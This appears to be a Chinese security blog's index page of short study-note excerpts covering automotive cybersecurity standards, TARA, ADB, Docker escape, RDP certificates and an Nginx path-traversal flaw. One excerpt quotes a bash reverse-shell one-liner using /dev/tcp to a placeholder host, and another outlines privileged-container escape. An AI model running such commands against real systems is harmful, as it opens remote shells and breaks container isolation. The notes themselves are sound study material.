M、N、O、L分别指什么类型的汽车?

在《汽车整车信息安全技术要求》中的标准适用范围提到了: 本文件适用于M类、N类及至少装有1个电子控制单元的O类车辆。 同时在《R155》的Scope中也提到: This Regulation applies to vehicles, with regard to cyber security, ...
学习笔记

什么是TARA分析?

TARA分析是Threat Analysis and Risk Assessment(威胁分析与风险评估)的缩写,它是一种在汽车电子电气架构中常用的网络安全威胁分析与风险评估方法论。TARA分析是依据“ISO/SAE 21434 道路车辆-网络安全工程标准”构建网络安全体系的重要过程,ISO 21434...
学习笔记

ADB调试常用指令

常用的ADB调试指令: 启动和停止ADB服务 adb start-server:启动ADB服务。 adb kill-server:停止ADB服务。 设备连接管理 adb devices:列出所有已连接的Android设备或模拟器。 adb connect <device-ip>:<port>:通过TCP/IP连接到...
学习笔记

容器安全之Docker逃逸

一、危险配置 1. Privileged特权模式 利用条件:容器以特权模式运行 docker run --privileged 以特权模式运行的容器可以访问宿主机上的所有设备。 可以在容器中挂载宿主机的磁盘,然后将根目录切换过去。 2. SYS_ADMIN ...
学习笔记

对反弹shell中0>&1的理解

今天在学习反弹shell,遇到一个经典的构造: /bin/bash -i &> /dev/tcp/host/port 0>&1 对语句最后的0>&1我百思不得其解,为什么标准输入重定向到标准输出,攻击端输入的指定就到本机来了呢?标准输入指的是本机键盘输入吗...
学习笔记

Wireshark分析RDP服务器专有证书

本文记录一次使用Wireshark分析RDP证书的过程,这次遇到的证书比较特殊,是服务器专有证书(Server Proprietary Certificate),不能直接使用X.509格式的方式查看,当时为了分析这个证书花了不少时间。 下面记录一下分析过程,不想看过程可以直接...
学习笔记

Docker容器识别

想研究的课题是容器的渗透,一大方向就是容器逃逸。那么逃逸前自然需要判断是否处在容器中。那么就需要了解容器有哪些特征。假设进入一台远程服务器,通过何种手段开源判断此环境是否在容器之中。 容器虚拟技术有很多,最主流的就是Docker,也比...

Nginx目录穿越漏洞

漏洞介绍 Nginx在配置alias的时候,如果location最后不是以斜杠结尾,而alias以斜杠结尾,那么将出现目录穿越漏洞。 通过实验了解漏洞 实验靶场用的是《从0到1:CTFer成长之路》第一章第三节任意文件读取漏洞的第2个实验靶场。 ...
搞搞学术